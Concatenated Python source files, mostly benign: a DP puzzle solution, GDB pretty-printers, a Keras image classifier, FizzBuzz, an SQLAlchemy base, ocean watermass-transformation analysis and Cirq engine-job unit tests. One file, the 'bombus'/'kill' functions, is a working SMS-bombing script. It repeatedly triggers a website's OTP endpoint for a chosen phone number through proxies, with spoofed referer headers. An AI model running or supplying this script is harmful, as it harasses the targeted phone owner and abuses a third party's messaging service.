if score > ndp[j][0]:
ndp[j] = [score, ways]
elif score == ndp[j][0]:
ndp[j][1] = (ndp[j][1] + ways) % M
if ndp[j][1] and board[i][j] != 'E':
ndp[j][0] += int(board[i][j])
dp = ndp
return dp[0]
def pathsWithMaxScore_kamyu(self, board):
"""
:type board: List[str]
:rtype: List[int]
"""
MOD = 10**9+7
directions = [[1, 0], [0, 1], [1, 1]]
dp = [[[0, 0] for r in range(len(board[0])+1)] for r in range(2)]
dp[(len(board)-1)%2][len(board[0])-1] = [0, 1]
for r in reversed(range(len(board))):
for c in reversed(range(len(board[0]))):
if board[r][c] in "XS":
continue
dp[r%2][c] = [0, 0] # BAD: need to reset as reusing two rows
for dr, dc in directions:
if dp[r%2][c][0] < dp[(r+dr)%2][c+dc][0]:
dp[r%2][c] = dp[(r+dr)%2][c+dc][:]
elif dp[r%2][c][0] == dp[(r+dr)%2][c+dc][0]:
dp[r%2][c][1] = (dp[r%2][c][1]+dp[(r+dr)%2][c+dc][1]) % MOD
if dp[r%2][c][1] and board[r][c] != 'E':
dp[r%2][c][0] += int(board[r][c])
return dp[0][0]
print(Solution().pathsWithMaxScore(["E23","2X2","12S"])) # [7,1]
# E23
# 2X2
# 12S
print(Solution().pathsWithMaxScore(["E12","1X1","21S"])) # [4,2]
print(Solution().pathsWithMaxScore(["E11","XXX","11S"])) # [0,0]
|
# Python GDB formatters for parallel-hashmap
# tested with GCC 10.2 / GDB 9.2
# to install it, ensure the script location is in the Python path
# and type the following command (or put it in $HOME/.gdbinit):
# python
# import phmap_gdb
# end
import gdb.printing
def counter():
i = 0
while(True):
yield str(i)
i += 1
def slot_iterator(base_obj):
index = -1
n_items = 0
size = int(base_obj["size_"])
while n_items < size:
index += 1
if int(base_obj["ctrl_"][index]) < 0:
continue
n_items += 1
yield base_obj["slots_"][index]
def parallel_slot_iterator(base_obj):
array = base_obj["sets_"]
array_len = int(array.type.template_argument(1))
for index in range(array_len):
obj = array["_M_elems"][index]["set_"]
yield from slot_iterator(obj)
def flat_map_iterator(name, item):
yield (next(name), item["value"]["first"])
yield (next(name), item["value"]["second"])
def flat_set_iterator(name, item):
yield (next(name), item)
def node_map_iterator(name, item):
yield (next(name), item.dereference()["first"])
yield (next(name), item.dereference()["second"])
def node_set_iterator(name, item):
yield (next(name), item.dereference())
def traverse(iterator, slot_type_iterator):
name = counter()
for item in iterator:
yield from slot_type_iterator(name, item)
def parallel_size(parallel_hash_obj):
array = parallel_hash_obj["sets_"]
array_len = int(array.type.template_argument(1))
size = 0
for index in range(array_len):
size += array["_M_elems"][index]["set_"]["size_"]
return size
class FlatMapPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(slot_iterator(self.val), flat_map_iterator)
def to_string(self):
return f"gtl::flat_hash_map with {int(self.val['size_'])} elements"
def display_hint(self):
return "map"
class FlatSetPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(slot_iterator(self.val), flat_set_iterator)
def to_string(self):
return f"gtl::flat_hash_set with {int(self.val['size_'])} elements"
def display_hint(self):
return "array"
class NodeMapPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(slot_iterator(self.val), node_map_iterator)
def to_string(self):
return f"gtl::node_hash_map with {int(self.val['size_'])} elements"
def display_hint(self):
return "map"
class NodeSetPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(slot_iterator(self.val), node_set_iterator)
def to_string(self):
return f"gtl::node_hash_set with {int(self.val['size_'])} elements"
def display_hint(self):
return "array"
class ParallelFlatMapPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(parallel_slot_iterator(self.val), flat_map_iterator)
def to_string(self):
return f"gtl::parallel_flat_hash_map with {parallel_size(self.val)} elements"
def display_hint(self):
return "map"
class ParallelFlatSetPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(parallel_slot_iterator(self.val), flat_set_iterator)
def to_string(self):
return f"gtl::parallel_flat_hash_set with {parallel_size(self.val)} elements"
def display_hint(self):
return "array"
class ParallelNodeMapPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(parallel_slot_iterator(self.val), node_map_iterator)
def to_string(self):
return f"gtl::parallel_node_hash_map with {parallel_size(self.val)} elements"
def display_hint(self):
return "map"
class ParallelNodeSetPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(parallel_slot_iterator(self.val), node_set_iterator)
def to_string(self):
return f"gtl::parallel_node_hash_set with {parallel_size(self.val)} elements"
def display_hint(self):
return "array"
def build_pretty_printer():
pp = gdb.printing.RegexpCollectionPrettyPrinter("phmap")
pp.add_printer('flat_hash_map', '^gtl::flat_hash_map<.*>$', FlatMapPrinter)
pp.add_printer('flat_hash_set', '^gtl::flat_hash_set<.*>$', FlatSetPrinter)
pp.add_printer('node_hash_map', '^gtl::node_hash_map<.*>$', NodeMapPrinter)
pp.add_printer('node_hash_set', '^gtl::node_hash_set<.*>$', NodeSetPrinter)
pp.add_printer('parallel_flat_hash_map', '^gtl::parallel_flat_hash_map<.*>$', ParallelFlatMapPrinter)
pp.add_printer('parallel_flat_hash_set', '^gtl::parallel_flat_hash_set<.*>$', ParallelFlatSetPrinter)
pp.add_printer('parallel_node_hash_map', '^gtl::parallel_node_hash_map<.*>$', ParallelNodeMapPrinter)
pp.add_printer('parallel_node_hash_set', '^gtl::parallel_node_hash_set<.*>$', ParallelNodeSetPrinter)
return pp
gdb.printing.register_pretty_printer(gdb.current_objfile(), build_pretty_printer())
|
import glob
import os
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from matplotlib.image import imread
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import OneHotEncoder
# For image from url
from PIL import Image
import requests
from io import BytesIO
# %% Data
def getdata(folder):
files = glob.glob(folder + '/*')
images = np.array([imread(file) for file in files])
labels = np.array([
os.path.basename(file).split('_')[0] for file in files
    ], dtype=int)
return images, labels
# Images and labels
images, labels = getdata('data')
print(labels)
C = len(np.unique(labels))
print('Number of classes: %i' % C)
for i in [0,10,20]:
plt.figure()
plt.imshow(images[i])
plt.show()
# %% Transform to probabilities
# Encode labels to integers corresponding to classes
encoder = LabelEncoder()
labels_int = encoder.fit_transform(labels)
print(labels_int)
# One-hot encoding corresponding to "probabilities"
encoder_onehot = OneHotEncoder(sparse=False)
y = encoder_onehot.fit_transform(labels_int.reshape([-1,1]))
print(y)
# Decode
labels2 = encoder.inverse_transform(np.argmax(y,axis=1))
print('Check decoding')
print(labels)
print(labels2)
# %% Test data
images_test, labels_test = getdata('data_test')
y_test = encoder_onehot.transform(encoder.transform(labels_test).reshape([-1,1]))
# %% Model
print('Shape of input image data')
print(images[0].shape)
# Model
model = tf.keras.Sequential([
tf.keras.layers.Flatten(input_shape=images[0].shape),
tf.keras.layers.Dense(64, 'relu'),
tf.keras.layers.Dense(16, 'relu'),
tf.keras.layers.Dense(C, 'softmax')
])
model.summary()
model.compile(
loss=tf.keras.losses.CategoricalCrossentropy()
,optimizer = 'adam'
,metrics=['accuracy']
)
#%% Evaluate accuracy
# Evaluate
y_m = model.predict(images)
print(y[:3])
print(y_m[:3])
print(np.sum(y_m,axis=1)[:3])
# Compute accuracy
labels_int_m = np.argmax(y_m,axis=1)
print('\nPredicted labels_int at model initialization')
print(labels_int_m)
print('labels_int')
print(labels_int)
correct_events = np.sum(labels_int == labels_int_m)
acc = correct_events/len(labels)
print('Correct events: %i' % correct_events)
print('Accuracy: %.2f' % acc)
# Evaluate
model.evaluate(images,y)
# %% Train
model.fit(images, y, epochs=10, verbose=2)
# %% Evaluate accuracy after training
model.evaluate(images,y)
model.evaluate(images_test,y_test)
# %% Try to predict for a street sign
# Get image
url = 'https://w.grube.de/media/image/7b/5f/63/art_78-101_1.jpg'
response = requests.get(url)
sign = Image.open(BytesIO(response.content))
print(sign)
# Plot
plt.figure()
plt.imshow(sign)
plt.show()
# Resize
sign = sign.resize([20,20])
plt.figure()
plt.imshow(sign)
plt.show()
# Careful: the downloaded image has integer values in [0, 255], unlike the training images (floats in [0, 1])
sign = np.array(sign)
print('\nValues at pixel(0,0)')
print(sign[0,0,:])
# Transform to range [0,1]
sign = sign/255
print('\nValues at pixel(0,0)')
print(sign[0,0,:])
# Predict with trained model
y_sign = model.predict(np.array([sign]))
print('\nPredicted probabilities')
print(y_sign)
print(encoder.inverse_transform(np.argmax(y_sign,axis=1)))
|
# fizzbuzz.py
# Write a short program that prints each number from 1 to 100 on a new line.
# For each multiple of 3, print "Fizz" instead of the number.
# For each multiple of 5, print "Buzz" instead of the number.
# For numbers which are multiples of both 3 and 5, print "FizzBuzz" instead of the number.
for i in range(1, 101):
if i % 3 == 0 and i % 5 == 0:
print("FizzBuzz")
elif i % 3 == 0:
print("Fizz")
elif i % 5 == 0:
print("Buzz")
else:
print(i)
|
from dataclasses import dataclass
from sqlalchemy.ext.declarative import as_declarative, declared_attr
@dataclass
@as_declarative()
class Base(object):
@declared_attr
def __tablename__(cls) -> str:
return cls.__name__.lower()
def json(self) -> dict:
dict_base = self.__dict__.copy()
for key in dict_base.copy():
if key.startswith("_"):
del dict_base[key]
return dict_base
|
import xarray as xr
import numpy as np
from xhistogram.xarray import histogram
# Watermass transformation calculation
def _calc_shortwave_penetration(ds,xgrid):
R = 0.58
h1 = 0.35
h2 = 23
# Calculate in 1D
Fps77 = R*np.exp(-ds['depth_i']/h1)+(1-R)*np.exp(-ds['depth_i']/h2)
# Now get a 4D shortwave field
shortwave = ds['sr']*Fps77
# and take the divergence
# (note that for taking the derivative, 'depth' must be positive upward, so reverse the sign)
# (subsequently, reverse the sign so that it is consistent with the other variables)
dsr4d = xgrid.derivative(-shortwave,'Z')
return dsr4d
def _calc_densityflux(FW,Q,S,alpha,beta,Cp=4200):
F = xr.Dataset()
F['heat'] = (alpha/Cp)*Q
F['fw'] = -FW*S*beta
F['total'] = F['heat']+F['fw']
return F
def calc_densityflux(ds,xgrid,penetrative_sw=True):
mask = _create_mask(ds)
if penetrative_sw:
dsr4d = _calc_shortwave_penetration(ds,xgrid)
Q = mask*ds['ht']+dsr4d
else:
Q = mask*(ds['ht']+ds['sr'])
FW = mask*ds['fw']
F = _calc_densityflux(FW,Q,ds['sa'],ds['alpha'],ds['beta'])
return F
def _create_mask(ds):
# Create a 3D mask with 1/dz in the surface and zero elsewhere
if ds['dz'].size != 1:
idz = 1/ds['dz'][0].values
mask = xr.concat([idz*xr.ones_like(ds['sa'].isel(time=0,depth=0)),
xr.zeros_like(ds['sa'].isel(time=0,depth=slice(1,None)))],
dim='depth')
else:
idz = 1/ds['dz'].values
mask = idz*xr.ones_like(ds['sa'].isel(time=0))
return mask
### Watermass transformation calculation
def _calc_watermasstransformation(F,density,b,V,density_edges):
# Discrete volume calculation derived in Appendix 7.5 of Groeskamp et al (2018)
G = xr.Dataset()
for var in F.data_vars:
gFbV = density*b*F[var]*V
nanmask=np.isnan(gFbV)
if 'depth' in density.dims:
intdims = ['lat','lon','depth']
else:
intdims = ['lat','lon']
G[var] = histogram(density.where(~nanmask),bins=[density_edges],weights=gFbV.where(~nanmask),dim=intdims)/np.diff(density_edges)
return G
def calc_watermasstransformation(ds,xgrid,gn_edges,density='gamman',b_ones=False,penetrative_sw=True):
F = calc_densityflux(ds,xgrid,penetrative_sw)
if density=='gamman':
density = ds['gamman']
elif density=='sigma0':
density = ds['sigma0']+1000
ds['b'] = xr.ones_like(ds['b'])
if b_ones:
ds['b'] = xr.ones_like(ds['b'])
G = _calc_watermasstransformation(F,density,ds['b'],ds['vol4d'],gn_edges)
return G
### Storage change calculation
def _calc_dMdt(mass,gamman,gn_edges):
# Augment edges
gn_edges_all = np.concatenate(([np.array(-99999)],gn_edges,[np.array(99999)]))
# Histogram mass
nanmask=np.isnan(gamman)
M_on_gamma = histogram(gamman.where(~nanmask),
bins=[gn_edges_all],
weights=mass.where(~nanmask),
dim=['lat','lon','depth']).transpose()
    # To integrate for all volume with density greater than a certain value,
# take cumulative sum and reassign the coordinates to align with G
M_on_gamma_cumsum = xr.concat([xr.zeros_like(M_on_gamma.isel({'gamman_bin':0})),
M_on_gamma.cumsum('gamman_bin')],dim='gamman_bin')
    # We wish to have the total mass for the volume with density greater than that contour,
    # so subtract the cumulative sum from the total sum to reverse the direction
M_reverse = (M_on_gamma.sum('gamman_bin')-M_on_gamma_cumsum)
    # Now we can get rid of the boundary contours, which were there to ensure that all
    # of the volume was captured, and we assign the coordinates to match with G
M = M_reverse.isel(gamman_bin=slice(1,-1)).assign_coords({'gamman_bin':gn_edges})
# Calculate the derivative with respect to time
dMdt = M.diff('time')/(M['time'].diff('time').astype('float')*1E-9)
    # The time derivative is aligned with the start of each month,
# so define a new time coordinate
timenew = M.time[:-1]+(M['time'].shift({'time':-1})-M['time'][:-1])/2
# Assign that coordinate for the time derivative
dMdt = dMdt.assign_coords(time=timenew)
# Rename
dMdt.name = 'dMdt'
return dMdt
def calc_dMdt(ds,gn_edges):
return _calc_dMdt(ds['mass'],ds['gamman'],gn_edges)
### b-factor
# Wrappers for derivative operations in xgcm
def _xgcm_interp_and_derivative(da,xgrid,dim,boundary=None):
# Interpolate to grid cell boundaries
da_i = xgrid.interp(da,dim,boundary=boundary)
# Take the derivative
dadl = xgrid.derivative(da_i,dim,boundary=boundary)
return dadl
def _xgcm_interp_and_derivative_3D(da,xgrid,dims=['X','Y','Z'],boundaries=[None,None,None]):
# Calculate gradients in X, Y and Z
dad1 = _xgcm_interp_and_derivative(da,xgrid,dims[0],boundaries[0])
dad2 = _xgcm_interp_and_derivative(da,xgrid,dims[1],boundaries[1])
dad3 = _xgcm_interp_and_derivative(da,xgrid,dims[2],boundaries[2])
return dad1, dad2, dad3
def _calc_bfactor(T,S,rho,alpha,beta,gamma,xgrid):
    # Derivatives of T, S, and gamma
dims = ['X','Y','Z']
boundaries = [None,'extend','extend']
dTdx,dTdy,dTdz = _xgcm_interp_and_derivative_3D(T,xgrid,dims,boundaries)
dSdx,dSdy,dSdz = _xgcm_interp_and_derivative_3D(S,xgrid,dims,boundaries)
dgdx,dgdy,dgdz = _xgcm_interp_and_derivative_3D(gamma,xgrid,dims,boundaries)
# Locally referenced potential density
drdx = rho*(-alpha*dTdx + beta*dSdx)
drdy = rho*(-alpha*dTdy + beta*dSdy)
drdz = rho*(-alpha*dTdz + beta*dSdz)
# Calculate the absolute magnitudes
    abs_drd = np.sqrt(np.square(drdx) + np.square(drdy) + np.square(drdz))
    abs_dgd = np.sqrt(np.square(dgdx) + np.square(dgdy) + np.square(dgdz))
# Calculate ratio
b = abs_drd/abs_dgd
return b
def calc_bfactor(ds,xgrid):
return _calc_bfactor(ds['ct'],ds['sa'],ds['rho'],ds['alpha'],ds['beta'],ds['gamman'],xgrid)
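### Example workflow
# Illustrative sketch only (not from the original module): one plausible way to
# chain the helpers above, assuming `ds` carries the variables referenced
# throughout this file ('ht', 'sr', 'fw', 'sa', 'ct', 'rho', 'alpha', 'beta',
# 'gamman', 'b', 'dz', 'vol4d', 'mass', 'depth_i') and `xgrid` is the matching
# xgcm grid object.
def _example_wmt_workflow(ds, xgrid, gn_edges):
    ds['b'] = calc_bfactor(ds, xgrid)
    G = calc_watermasstransformation(ds, xgrid, gn_edges, density='gamman')
    dMdt = calc_dMdt(ds, gn_edges)
    return G, dMdt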
|
import requests
import time
def bombus(number):
r=requests.session()
url="https://www.<redacted>.com/Personalization/SendOTP?mobile={}&phoneCode=91&OTPSource=SIGNIN".format(number)
proxy={'http':'45.7.231.86','http':'66.42.107.87:8080','http':'68.183.99.96:8080'}
headers={"Host":"www.redbus.in",
"Connection": "close",
"Origin": "https://smsbomber.biz",
"User-Agent": "Mozilla/5.0 (X11; Linux 64) AppleWebKit/547.36 (KHTML, like Gecko) Chrome/70.0.3383.203 Safari/337.35",
"DNT": "1",
"Accept": "*/*",
"Referer": "https://smsbomber.biz/bomb.php",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-IN,en-GB;q=0.9,en-US;q=0.8,en;q=0.7",
"Cookie": "jfpj=b538ab3ac87701158bde432b134e431d; country=IND; currency=INR; selectedCurrency=INR; language=en; deviceSessionId=c7352b25-7107-43f2-af58-12e747m85edd; lzFlag=1; bCore=1; defaultCountry=IND"}
print(r.get(url,headers=headers,proxies=proxy).text)
def kill(number):
for i in range(101):
try:
bombus(number)
time.sleep(10)
except:
pass
|
# -*- coding: utf-8 -*-
import unittest
from cwr.parser.encoder.dictionary import InstrumentValueDictionaryEncoder
from cwr.table_value import InstrumentValue
"""
Acknowledgement to dictionary encoding tests.
The following cases are tested:
"""
__author__ = 'Bernardo Martínez Garrido'
__license__ = 'MIT'
__status__ = 'Development'
class TestInstrumentValueEncoding(unittest.TestCase):
def setUp(self):
self._encoder = InstrumentValueDictionaryEncoder()
def test_encoded(self):
data = InstrumentValue('BBF', 'Bamboo Flute', 'National/Folk',
'same as Dizi or D\'Tzu')
encoded = self._encoder.encode(data)
self.assertEqual('BBF', encoded['code'])
self.assertEqual('Bamboo Flute', encoded['name'])
self.assertEqual('National/Folk', encoded['family'])
self.assertEqual('same as Dizi or D\'Tzu', encoded['description'])
|
# Copyright 2019 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
from unittest import mock
import pytest
from google.protobuf import any_pb2, timestamp_pb2
from google.protobuf.text_format import Merge
import cirq
import cirq_google as cg
from cirq_google.api import v1, v2
from cirq_google.engine import util
from cirq_google.cloud import quantum
from cirq_google.engine.engine import EngineContext
from cirq_google.engine.test_utils import uses_async_mock
@pytest.fixture(scope='session', autouse=True)
def mock_grpc_client():
with mock.patch(
'cirq_google.engine.engine_client.quantum.QuantumEngineServiceClient'
) as _fixture:
yield _fixture
def test_engine():
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
assert job.engine().project_id == 'a'
def test_program():
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
assert job.program().project_id == 'a'
assert job.program().program_id == 'b'
def test_id():
job = cg.EngineJob(
'a',
'b',
'steve',
EngineContext(),
_job=quantum.QuantumJob(create_time=timestamp_pb2.Timestamp(seconds=1581515101)),
)
assert job.id() == 'steve'
def test_create_time():
job = cg.EngineJob(
'a',
'b',
'steve',
EngineContext(),
_job=quantum.QuantumJob(create_time=timestamp_pb2.Timestamp(seconds=1581515101)),
)
assert job.create_time() == datetime.datetime(
2020, 2, 12, 13, 45, 1, tzinfo=datetime.timezone.utc
)
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_async')
def test_update_time(get_job):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
get_job.return_value = quantum.QuantumJob(
update_time=timestamp_pb2.Timestamp(seconds=1581515101)
)
assert job.update_time() == datetime.datetime(
2020, 2, 12, 13, 45, 1, tzinfo=datetime.timezone.utc
)
get_job.assert_called_once_with('a', 'b', 'steve', False)
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_async')
def test_description(get_job):
job = cg.EngineJob(
'a', 'b', 'steve', EngineContext(), _job=quantum.QuantumJob(description='hello')
)
assert job.description() == 'hello'
get_job.return_value = quantum.QuantumJob(description='hello')
assert cg.EngineJob('a', 'b', 'steve', EngineContext()).description() == 'hello'
get_job.assert_called_once_with('a', 'b', 'steve', False)
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.set_job_description_async')
def test_set_description(set_job_description):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
set_job_description.return_value = quantum.QuantumJob(description='world')
assert job.set_description('world').description() == 'world'
set_job_description.assert_called_with('a', 'b', 'steve', 'world')
set_job_description.return_value = quantum.QuantumJob(description='')
assert job.set_description('').description() == ''
set_job_description.assert_called_with('a', 'b', 'steve', '')
def test_labels():
job = cg.EngineJob(
'a', 'b', 'steve', EngineContext(), _job=quantum.QuantumJob(labels={'t': '1'})
)
assert job.labels() == {'t': '1'}
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.set_job_labels_async')
def test_set_labels(set_job_labels):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
set_job_labels.return_value = quantum.QuantumJob(labels={'a': '1', 'b': '1'})
assert job.set_labels({'a': '1', 'b': '1'}).labels() == {'a': '1', 'b': '1'}
set_job_labels.assert_called_with('a', 'b', 'steve', {'a': '1', 'b': '1'})
set_job_labels.return_value = quantum.QuantumJob()
assert job.set_labels({}).labels() == {}
set_job_labels.assert_called_with('a', 'b', 'steve', {})
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.add_job_labels_async')
def test_add_labels(add_job_labels):
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=quantum.QuantumJob(labels={}))
assert job.labels() == {}
add_job_labels.return_value = quantum.QuantumJob(labels={'a': '1'})
assert job.add_labels({'a': '1'}).labels() == {'a': '1'}
add_job_labels.assert_called_with('a', 'b', 'steve', {'a': '1'})
add_job_labels.return_value = quantum.QuantumJob(labels={'a': '2', 'b': '1'})
assert job.add_labels({'a': '2', 'b': '1'}).labels() == {'a': '2', 'b': '1'}
add_job_labels.assert_called_with('a', 'b', 'steve', {'a': '2', 'b': '1'})
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.remove_job_labels_async')
def test_remove_labels(remove_job_labels):
job = cg.EngineJob(
'a', 'b', 'steve', EngineContext(), _job=quantum.QuantumJob(labels={'a': '1', 'b': '1'})
)
assert job.labels() == {'a': '1', 'b': '1'}
remove_job_labels.return_value = quantum.QuantumJob(labels={'b': '1'})
assert job.remove_labels(['a']).labels() == {'b': '1'}
remove_job_labels.assert_called_with('a', 'b', 'steve', ['a'])
remove_job_labels.return_value = quantum.QuantumJob(labels={})
assert job.remove_labels(['a', 'b', 'c']).labels() == {}
remove_job_labels.assert_called_with('a', 'b', 'steve', ['a', 'b', 'c'])
def test_processor_ids():
job = cg.EngineJob(
'a',
'b',
'steve',
EngineContext(),
_job=quantum.QuantumJob(
scheduling_config=quantum.SchedulingConfig(
processor_selector=quantum.SchedulingConfig.ProcessorSelector(
processor_names=['projects/a/processors/p']
)
)
),
)
assert job.processor_ids() == ['p']
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_async')
def test_status(get_job):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.RUNNING)
)
get_job.return_value = qjob
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
assert job.status() == 'RUNNING'
get_job.assert_called_once()
assert job.execution_status() == quantum.ExecutionStatus.State.RUNNING
def test_failure():
job = cg.EngineJob(
'a',
'b',
'steve',
EngineContext(),
_job=quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(
state=quantum.ExecutionStatus.State.FAILURE,
failure=quantum.ExecutionStatus.Failure(
error_code=quantum.ExecutionStatus.Failure.Code.SYSTEM_ERROR,
error_message='boom',
),
)
),
)
assert job.failure() == ('SYSTEM_ERROR', 'boom')
def test_failure_with_no_error():
job = cg.EngineJob(
'a',
'b',
'steve',
EngineContext(),
_job=quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS)
),
)
assert not job.failure()
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_async')
def test_get_repetitions_and_sweeps(get_job):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
get_job.return_value = quantum.QuantumJob(
run_context=util.pack_any(
v2.run_context_pb2.RunContext(
parameter_sweeps=[v2.run_context_pb2.ParameterSweep(repetitions=10)]
)
)
)
assert job.get_repetitions_and_sweeps() == (10, [cirq.UnitSweep])
get_job.assert_called_once_with('a', 'b', 'steve', True)
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_async')
def test_get_repetitions_and_sweeps_v1(get_job):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
get_job.return_value = quantum.QuantumJob(
run_context=util.pack_any(
v1.program_pb2.RunContext(
parameter_sweeps=[v1.params_pb2.ParameterSweep(repetitions=10)]
)
)
)
with pytest.raises(ValueError, match='v1 RunContext is not supported'):
job.get_repetitions_and_sweeps()
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_async')
def test_get_repetitions_and_sweeps_unsupported(get_job):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
get_job.return_value = quantum.QuantumJob(
run_context=any_pb2.Any(type_url='type.googleapis.com/unknown.proto')
)
with pytest.raises(ValueError, match='unsupported run_context type: unknown.proto'):
job.get_repetitions_and_sweeps()
def test_get_processor():
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(processor_name='projects/a/processors/p')
)
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
assert job.get_processor().processor_id == 'p'
def test_get_processor_no_processor():
qjob = quantum.QuantumJob(execution_status=quantum.ExecutionStatus())
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
assert not job.get_processor()
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_calibration')
def test_get_calibration(get_calibration):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(
calibration_name='projects/a/processors/p/calibrations/123'
)
)
calibration = quantum.QuantumCalibration(
data=util.pack_any(
Merge(
"""
timestamp_ms: 123000,
metrics: [{
name: 'xeb',
targets: ['0_0', '0_1'],
values: [{
double_val: .9999
}]
}, {
name: 't1',
targets: ['0_0'],
values: [{
double_val: 321
}]
}, {
name: 'globalMetric',
values: [{
int32_val: 12300
}]
}]
""",
v2.metrics_pb2.MetricsSnapshot(),
)
)
)
get_calibration.return_value = calibration
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
assert list(job.get_calibration()) == ['xeb', 't1', 'globalMetric']
get_calibration.assert_called_once_with('a', 'p', 123)
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_calibration_async')
def test_calibration__with_no_calibration(get_calibration):
job = cg.EngineJob(
'a',
'b',
'steve',
EngineContext(),
_job=quantum.QuantumJob(
name='projects/project-id/programs/test/jobs/test',
execution_status={'state': 'SUCCESS'},
),
)
calibration = job.get_calibration()
assert not calibration
assert not get_calibration.called
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.cancel_job_async')
def test_cancel(cancel_job):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
job.cancel()
cancel_job.assert_called_once_with('a', 'b', 'steve')
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.delete_job_async')
def test_delete(delete_job):
job = cg.EngineJob('a', 'b', 'steve', EngineContext())
job.delete()
delete_job.assert_called_once_with('a', 'b', 'steve')
RESULTS = quantum.QuantumResult(
result=util.pack_any(
Merge(
"""
sweep_results: [{
repetitions: 4,
parameterized_results: [{
params: {
assignments: {
key: 'a'
value: 1
}
},
measurement_results: {
key: 'q'
qubit_measurement_results: [{
qubit: {
id: '1_1'
}
results: '\006'
}]
}
},{
params: {
assignments: {
key: 'a'
value: 2
}
},
measurement_results: {
key: 'q'
qubit_measurement_results: [{
qubit: {
id: '1_1'
}
results: '\005'
}]
}
}]
}]
""",
v2.result_pb2.Result(),
)
)
)
BATCH_RESULTS = quantum.QuantumResult(
result=util.pack_any(
Merge(
"""
results: [{
sweep_results: [{
repetitions: 3,
parameterized_results: [{
params: {
assignments: {
key: 'a'
value: 1
}
},
measurement_results: {
key: 'q'
qubit_measurement_results: [{
qubit: {
id: '1_1'
}
results: '\006'
}]
}
},{
params: {
assignments: {
key: 'a'
value: 2
}
},
measurement_results: {
key: 'q'
qubit_measurement_results: [{
qubit: {
id: '1_1'
}
results: '\007'
}]
}
}]
}],
},{
sweep_results: [{
repetitions: 4,
parameterized_results: [{
params: {
assignments: {
key: 'a'
value: 3
}
},
measurement_results: {
key: 'q'
qubit_measurement_results: [{
qubit: {
id: '1_1'
}
results: '\013'
}]
}
},{
params: {
assignments: {
key: 'a'
value: 4
}
},
measurement_results: {
key: 'q'
qubit_measurement_results: [{
qubit: {
id: '1_1'
}
results: '\011'
}]
}
}]
}]
}]
""",
v2.batch_pb2.BatchResult(),
)
)
)
CALIBRATION_RESULT = quantum.QuantumResult(
result=util.pack_any(
Merge(
"""
results: [{
code: ERROR_CALIBRATION_FAILED
error_message: 'uh oh'
token: 'abc'
valid_until_ms: 1234567891000
metrics: {
timestamp_ms: 1234567890000,
metrics: [{
name: 'theta',
targets: ['0_0', '0_1'],
values: [{
double_val: .9999
}]
}]
}
}]
""",
v2.calibration_pb2.FocusedCalibrationResult(),
)
)
)
UPDATE_TIME = datetime.datetime.now(tz=datetime.timezone.utc)
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_results(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = RESULTS
job = cg.EngineJob('a', 'b', 'steve', EngineContext(), _job=qjob)
data = job.results()
assert len(data) == 2
assert str(data[0]) == 'q=0110'
assert str(data[1]) == 'q=1010'
get_job_results.assert_called_once_with('a', 'b', 'steve')
@uses_async_mock
@mock.patch('cirq_google.engine.engine_client.EngineClient.get_job_results_async')
def test_results_iter(get_job_results):
qjob = quantum.QuantumJob(
execution_status=quantum.ExecutionStatus(state=quantum.ExecutionStatus.State.SUCCESS),
update_time=UPDATE_TIME,
)
get_job_results.return_value = RESULTS
